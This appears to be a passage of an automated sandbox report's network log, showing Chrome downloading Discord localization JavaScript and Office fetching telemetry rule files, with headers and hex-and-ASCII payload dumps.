                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC966INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:44 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 1116184
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0dbe8e64271-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "6711db79358e775c42b3d16399971300"
                                                                                                                                                                                                                                                                                    Last-Modified: Sat, 23 Nov 2024 00:20:15 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8BL3Hg1iPOVxn5A87pef4tdfSc%2BCySCX2DzdFligwQPBpqC2MUdzrypxtZMBLaQt384qePz0etTpaonYJrfptK%2FgnmaLUBI9RL37e%2Blyems%2FH9h49YvBuDFJ48dM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC403INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 32 32 37 32 31 22 5d 2c 7b 37 35 36 38 30 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6f 2c 74 29 7b 74 2e 72 28 6f 29 2c 6f 2e 64 65 66 61 75 6c 74 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 27 7b 22 37 73 46 4e 66 58 22 3a 22 52 65 6d 6f 76 65 20 6d 65 6d 62 65 72 22 2c 22 51 2b 75 44 30 39 22 3a 22 54 68 69 73 20 70 65 72 73 6f 6e 5c 27 73 20 68 69 67 68 65 73 74 20 72 6f 6c 65 20 69 73 20 74 68 65 20 73 61 6d 65 20 61 73 20 79 6f 75 72 73 2c 20 73 6f 20 79 6f 75 20 63 61 6e 6e 6f 74 20 6d 61 6e 61 67 65 20 74 68
                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["22721"],{756809:function(e,o,t){t.r(o),o.default=JSON.parse('{"7sFNfX":"Remove member","Q+uD09":"This person\'s highest role is the same as yours, so you cannot manage th
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1369INData Raw: 20 79 6f 75 20 65 6e 61 62 6c 65 20 69 74 2e 22 2c 22 39 66 6d 58 57 46 22 3a 22 59 6f 75 20 68 61 76 65 20 61 20 76 65 72 69 66 69 65 64 20 65 6d 61 69 6c 2e 22 2c 22 38 50 37 4d 58 31 22 3a 22 53 6f 72 72 79 20 3a 28 22 2c 22 53 78 73 42 46 42 22 3a 22 43 61 6e 20 79 6f 75 20 74 65 6c 6c 20 75 73 20 6d 6f 72 65 3f 22 2c 22 49 66 34 69 54 55 22 3a 5b 5b 36 2c 22 73 75 62 73 63 72 69 62 65 72 43 6f 75 6e 74 22 2c 7b 22 3d 31 22 3a 5b 5b 37 5d 2c 22 20 42 6f 6f 73 74 22 5d 2c 22 6f 74 68 65 72 22 3a 5b 5b 37 5d 2c 22 20 42 6f 6f 73 74 73 22 5d 7d 2c 30 2c 22 63 61 72 64 69 6e 61 6c 22 5d 5d 2c 22 30 68 37 62 78 38 22 3a 22 45 6e 61 62 6c 65 20 48 61 72 64 77 61 72 65 20 53 63 61 6c 69 6e 67 22 2c 22 50 65 58 68 67 49 22 3a 22 53 61 76 65 20 49 6d 61 67 65
                                                                                                                                                                                                                                                                                    Data Ascii: you enable it.","9fmXWF":"You have a verified email.","8P7MX1":"Sorry :(","SxsBFB":"Can you tell us more?","If4iTU":[[6,"subscriberCount",{"=1":[[7]," Boost"],"other":[[7]," Boosts"]},0,"cardinal"]],"0h7bx8":"Enable Hardware Scaling","PeXhgI":"Save Image
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1263INData Raw: 6c 69 61 6e 63 65 2e 22 2c 22 66 69 4c 74 4a 69 22 3a 22 4e 69 74 72 6f 20 6d 65 6d 62 65 72 73 20 67 65 74 20 65 61 72 6c 79 20 62 65 74 61 20 61 63 63 65 73 73 20 74 6f 20 74 68 65 20 52 65 6d 69 78 20 74 6f 6f 6c 2e 20 4a 6f 69 6e 20 4e 69 74 72 6f 20 74 6f 20 63 72 65 61 74 65 20 61 6e 64 20 73 68 61 72 65 20 79 6f 75 72 20 6f 77 6e 20 6d 65 6d 65 73 20 77 69 74 68 69 6e 20 74 68 65 20 6d 6f 62 69 6c 65 20 61 70 70 2c 20 61 6e 64 20 6d 75 63 68 20 6d 6f 72 65 21 22 2c 22 31 77 43 48 34 4f 22 3a 22 59 6f 75 20 6e 65 65 64 20 74 6f 20 66 69 6c 6c 20 6f 75 74 20 61 6e 79 20 65 6d 70 74 79 20 74 69 65 72 73 20 74 6f 20 70 72 65 76 69 65 77 20 77 68 61 74 20 65 76 65 72 79 74 68 69 6e 67 20 6c 6f 6f 6b 73 20 6c 69 6b 65 22 2c 22 31 58 75 66 63 6e 22 3a 22
                                                                                                                                                                                                                                                                                    Data Ascii: liance.","fiLtJi":"Nitro members get early beta access to the Remix tool. Join Nitro to create and share your own memes within the mobile app, and much more!","1wCH4O":"You need to fill out any empty tiers to preview what everything looks like","1Xufcn":"
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1369INData Raw: 22 4e 6f 20 72 6f 6c 65 73 22 2c 22 6b 57 4f 2f 45 78 22 3a 22 54 65 6c 6c 20 70 65 6f 70 6c 65 20 61 20 6c 69 74 74 6c 65 20 6d 6f 72 65 20 61 62 6f 75 74 20 79 6f 75 72 20 65 76 65 6e 74 2e 20 4d 61 72 6b 64 6f 77 6e 2c 20 6e 65 77 20 6c 69 6e 65 73 2c 20 61 6e 64 20 6c 69 6e 6b 73 20 61 72 65 20 73 75 70 70 6f 72 74 65 64 2e 22 2c 22 52 65 2f 36 34 65 22 3a 22 53 65 6c 65 63 74 20 61 20 63 68 61 6e 6e 65 6c 22 2c 22 76 54 56 43 35 65 22 3a 5b 5b 38 2c 22 24 62 22 2c 5b 5b 31 2c 22 69 6e 73 74 61 6c 6c 65 64 41 70 70 6c 69 63 61 74 69 6f 6e 4e 61 6d 65 22 5d 5d 5d 2c 22 20 68 61 73 20 62 65 65 6e 20 61 75 74 68 6f 72 69 7a 65 64 20 61 6e 64 20 61 64 64 65 64 20 74 6f 20 79 6f 75 72 20 61 70 70 73 21 22 5d 2c 22 57 49 44 45 31 4e 22 3a 22 50 65 72 6d 69
                                                                                                                                                                                                                                                                                    Data Ascii: "No roles","kWO/Ex":"Tell people a little more about your event. Markdown, new lines, and links are supported.","Re/64e":"Select a channel","vTVC5e":[[8,"$b",[[1,"installedApplicationName"]]]," has been authorized and added to your apps!"],"WIDE1N":"Permi
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1369INData Raw: 7a 61 74 69 6f 6e 20 66 69 72 73 74 21 22 2c 22 6d 6c 50 4d 43 77 22 3a 22 50 69 6e 6e 65 64 20 43 68 61 6e 6e 65 6c 73 22 2c 22 44 52 5a 69 66 6e 22 3a 5b 5b 38 2c 22 75 73 65 72 48 6f 6f 6b 22 2c 5b 5b 38 2c 22 24 62 22 2c 5b 5b 31 2c 22 75 73 65 72 22 5d 5d 5d 5d 5d 2c 22 20 63 72 65 61 74 65 64 20 74 68 65 20 73 74 69 63 6b 65 72 20 22 2c 5b 38 2c 22 74 61 72 67 65 74 48 6f 6f 6b 22 2c 5b 5b 38 2c 22 24 62 22 2c 5b 5b 31 2c 22 74 61 72 67 65 74 22 5d 5d 5d 5d 5d 5d 2c 22 66 31 2b 6f 4e 6a 22 3a 22 4e 6f 20 61 76 61 74 61 72 20 73 65 74 22 2c 22 69 51 7a 51 73 37 22 3a 22 53 68 61 72 65 20 41 63 74 69 76 69 74 79 20 4c 6f 67 73 22 2c 22 63 45 74 73 36 2b 22 3a 22 54 68 69 73 20 70 6c 61 74 66 6f 72 6d 20 69 73 20 64 69 73 61 62 6c 65 64 22 2c 22 55 54
                                                                                                                                                                                                                                                                                    Data Ascii: zation first!","mlPMCw":"Pinned Channels","DRZifn":[[8,"userHook",[[8,"$b",[[1,"user"]]]]]," created the sticker ",[8,"targetHook",[[8,"$b",[[1,"target"]]]]]],"f1+oNj":"No avatar set","iQzQs7":"Share Activity Logs","cEts6+":"This platform is disabled","UT
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1369INData Raw: 61 70 70 72 65 63 69 61 74 65 20 74 68 65 20 65 6e 74 68 75 73 69 61 73 6d 2c 20 62 75 74 2e 2e 2e 22 2c 22 66 72 43 77 61 57 22 3a 22 54 68 65 69 72 20 6d 65 73 73 61 67 65 73 20 77 69 6c 6c 20 62 65 20 68 69 64 64 65 6e 22 2c 22 74 32 77 56 30 4e 22 3a 22 4a 6f 69 6e 20 26 20 47 65 74 20 59 6f 75 72 20 41 76 61 74 61 72 20 44 65 63 6f 72 61 74 69 6f 6e 22 2c 22 59 77 4a 6e 47 78 22 3a 22 45 6e 74 65 72 20 69 6e 76 69 74 65 20 63 6f 64 65 2e 2e 2e 22 2c 22 66 79 42 56 52 6b 22 3a 22 43 61 6e 63 65 6c 65 64 22 2c 22 35 52 35 33 52 6b 22 3a 22 43 75 73 74 6f 6d 20 50 72 6f 66 69 6c 65 73 22 2c 22 43 38 71 66 6b 70 22 3a 22 44 65 6c 65 74 65 20 41 76 61 74 61 72 22 2c 22 4f 6c 57 68 6a 49 22 3a 5b 22 53 74 72 65 61 6d 20 22 2c 5b 31 2c 22 67 61 6d 65 54 69
                                                                                                                                                                                                                                                                                    Data Ascii: appreciate the enthusiasm, but...","frCwaW":"Their messages will be hidden","t2wV0N":"Join & Get Your Avatar Decoration","YwJnGx":"Enter invite code...","fyBVRk":"Canceled","5R53Rk":"Custom Profiles","C8qfkp":"Delete Avatar","OlWhjI":["Stream ",[1,"gameTi
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1369INData Raw: 2c 22 2b 61 73 35 5a 57 22 3a 22 42 6f 6f 73 74 20 41 64 6a 75 73 74 6d 65 6e 74 22 2c 22 61 76 4b 4d 5a 6d 22 3a 5b 22 52 65 70 6f 72 74 20 5b 22 2c 5b 38 2c 22 24 62 22 2c 5b 5b 31 2c 22 6c 69 73 74 69 6e 67 4e 61 6d 65 22 5d 5d 5d 2c 22 5d 22 5d 2c 22 50 70 39 4b 56 6c 22 3a 22 59 6f 75 20 77 69 6c 6c 20 6e 6f 74 20 67 65 74 20 61 20 63 72 65 64 69 74 20 72 65 66 75 6e 64 20 69 66 20 79 6f 75 20 63 68 6f 6f 73 65 20 74 6f 20 72 65 6d 6f 76 65 20 74 68 69 73 20 53 75 70 65 72 20 52 65 61 63 74 69 6f 6e 2e 22 2c 22 4d 6c 67 4c 46 78 22 3a 5b 5b 31 2c 22 6e 69 63 6b 6e 61 6d 65 30 22 5d 2c 22 20 61 6e 64 20 22 2c 5b 31 2c 22 6e 69 63 6b 6e 61 6d 65 31 22 5d 5d 2c 22 68 42 53 2f 7a 73 22 3a 22 41 6c 6c 6f 77 20 6d 65 6d 62 65 72 73 20 74 6f 20 63 72 65 61
                                                                                                                                                                                                                                                                                    Data Ascii: ,"+as5ZW":"Boost Adjustment","avKMZm":["Report [",[8,"$b",[[1,"listingName"]]],"]"],"Pp9KVl":"You will not get a credit refund if you choose to remove this Super Reaction.","MlgLFx":[[1,"nickname0"]," and ",[1,"nickname1"]],"hBS/zs":"Allow members to crea
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1369INData Raw: 68 65 64 22 2c 22 6e 7a 47 61 69 34 22 3a 22 50 61 73 73 65 64 20 56 65 72 69 66 69 63 61 74 69 6f 6e 20 4c 65 76 65 6c 22 2c 22 34 47 33 66 73 62 22 3a 22 43 6c 69 63 6b 20 79 6f 75 72 20 61 76 61 74 61 72 20 69 6e 20 74 68 65 20 6c 6f 77 65 72 2d 6c 65 66 74 20 63 6f 72 6e 65 72 20 74 6f 20 73 65 74 20 61 20 63 75 73 74 6f 6d 20 73 74 61 74 75 73 2e 22 2c 22 33 2b 4c 4f 31 39 22 3a 22 4f 6c 64 65 72 20 50 6f 73 74 73 22 2c 22 47 5a 78 6f 55 56 22 3a 22 53 6f 72 74 20 50 6f 73 74 73 22 2c 22 37 4c 6b 77 71 4b 22 3a 22 43 6f 6e 6e 65 63 74 69 6e 67 e2 80 a6 22 2c 22 79 78 56 73 42 41 22 3a 22 55 70 6c 6f 61 64 20 61 20 66 69 6c 65 22 2c 22 59 65 4c 71 38 2f 22 3a 5b 5b 32 2c 22 72 65 6d 61 69 6e 69 6e 67 22 5d 2c 22 20 6f 66 20 22 2c 5b 32 2c 22 74 6f 74
                                                                                                                                                                                                                                                                                    Data Ascii: hed","nzGai4":"Passed Verification Level","4G3fsb":"Click your avatar in the lower-left corner to set a custom status.","3+LO19":"Older Posts","GZxoUV":"Sort Posts","7LkwqK":"Connecting","yxVsBA":"Upload a file","YeLq8/":[[2,"remaining"]," of ",[2,"tot
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1369INData Raw: 47 68 22 3a 22 47 61 6d 65 20 50 72 6f 66 69 6c 65 22 2c 22 38 6c 51 77 66 33 22 3a 22 53 68 61 72 65 20 61 6e 20 61 70 70 22 2c 22 6a 6f 76 46 2b 2f 22 3a 5b 5b 36 2c 22 63 6f 75 6e 74 22 2c 7b 22 3d 31 22 3a 5b 5b 37 5d 2c 22 20 77 65 65 6b 22 5d 2c 22 6f 74 68 65 72 22 3a 5b 5b 37 5d 2c 22 20 77 65 65 6b 73 22 5d 7d 2c 30 2c 22 63 61 72 64 69 6e 61 6c 22 5d 2c 22 20 61 67 6f 22 5d 2c 22 55 34 4c 77 57 46 22 3a 22 54 68 69 73 20 77 69 6c 6c 20 64 65 74 65 72 6d 69 6e 65 20 77 68 65 74 68 65 72 20 6d 65 6d 62 65 72 73 20 77 68 6f 20 68 61 76 65 20 6e 6f 74 20 65 78 70 6c 69 63 69 74 6c 79 20 73 65 74 20 74 68 65 69 72 20 6e 6f 74 69 66 69 63 61 74 69 6f 6e 20 73 65 74 74 69 6e 67 73 20 72 65 63 65 69 76 65 20 61 20 6e 6f 74 69 66 69 63 61 74 69 6f 6e 20
                                                                                                                                                                                                                                                                                    Data Ascii: Gh":"Game Profile","8lQwf3":"Share an app","jovF+/":[[6,"count",{"=1":[[7]," week"],"other":[[7]," weeks"]},0,"cardinal"]," ago"],"U4LwWF":"This will determine whether members who have not explicitly set their notification settings receive a notification
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1369INData Raw: 69 6e 61 72 79 20 67 6f 69 6e 67 20 6f 6e 2e 5c 5c 6e 54 6f 20 63 6f 6e 74 69 6e 75 65 20 75 73 69 6e 67 20 44 69 73 63 6f 72 64 2c 20 22 2c 5b 38 2c 22 24 62 22 2c 5b 22 77 65 20 77 69 6c 6c 20 6e 65 65 64 20 79 6f 75 20 74 6f 20 76 65 72 69 66 79 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 2e 22 5d 5d 5d 2c 22 38 72 4d 2b 54 6b 22 3a 5b 22 57 65 e2 80 99 76 65 20 61 64 64 65 64 20 6e 65 77 20 77 61 79 73 20 74 6f 20 70 61 79 20 66 6f 72 20 4e 69 74 72 6f 20 69 6e 20 22 2c 5b 31 2c 22 63 6f 75 6e 74 72 79 22 5d 2c 22 2e 20 22 2c 5b 38 2c 22 24 6c 69 6e 6b 22 2c 5b 22 4c 65 61 72 6e 20 4d 6f 72 65 22 5d 2c 5b 5b 31 2c 22 68 65 6c 70 43 65 6e 74 65 72 4c 69 6e 6b 22 5d 5d 5d 5d 2c 22 31 67 67 57 6c 5a 22 3a 22 4d 61 6e 61 67 65 22 2c 22 47 54 49 33 42 77 22 3a
                                                                                                                                                                                                                                                                                    Data Ascii: inary going on.\\nTo continue using Discord, ",[8,"$b",["we will need you to verify your account."]]],"8rM+Tk":["Weve added new ways to pay for Nitro in ",[1,"country"],". ",[8,"$link",["Learn More"],[[1,"helpCenterLink"]]]],"1ggWlZ":"Manage","GTI3Bw":


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    82192.168.2.549803162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC673OUTGET /assets/09a6f112fcbc17f6cfd4.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:45 UTC962INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:44 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 238
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0dcaa2a8c9b-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "5822280717dd3cceefe1400d876d4a4a"
                                                                                                                                                                                                                                                                                    Last-Modified: Thu, 21 Nov 2024 16:26:17 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kTMXTCvgRQvEdzVMjL4%2B12ZuDCRSVpYCQf0oESRUYEuvhiLSjtOHQh3xzgWLi%2F2A7xsH4r9V4%2FFxW7suw%2FZk5wSPNd1qKLPIamhs7p86vsclYjG6IF3Hj8Q6e7bK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:45 UTC238INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 34 30 37 31 22 5d 2c 7b 31 32 36 34 33 36 3a 66 75 6e 63 74 69 6f 6e 28 70 2c 73 2c 61 29 7b 61 2e 72 28 73 29 2c 73 2e 64 65 66 61 75 6c 74 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 27 7b 22 63 67 64 41 73 37 22 3a 22 28 57 69 6c 6c 20 6f 70 65 6e 20 69 6e 20 61 20 6e 65 77 20 74 61 62 29 22 7d 27 29 7d 7d 5d 29 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 30 39 61 36 66 31 31 32 66 63 62 63 31 37 66 36 63 66 64 34 2e 6a 73 2e 6d 61 70
                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["4071"],{126436:function(p,s,a){a.r(s),s.default=JSON.parse('{"cgdAs7":"(Will open in a new tab)"}')}}]);//# sourceMappingURL=09a6f112fcbc17f6cfd4.js.map


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    83192.168.2.54980713.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:45 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:45 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 416
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                                                                                                    x-ms-request-id: ecf1de78-401e-0047-5d4b-3c8597000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201245Z-15b8b599d88hr8sfhC1TEBbca4000000036g00000000hv1k
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:45 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    84192.168.2.54980513.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:45 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:45 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 448
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 2822332a-801e-002a-6c23-3d31dc000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201245Z-178bfbc474b9fdhphC1NYCac0n00000004tg00000000gr5f
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:45 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
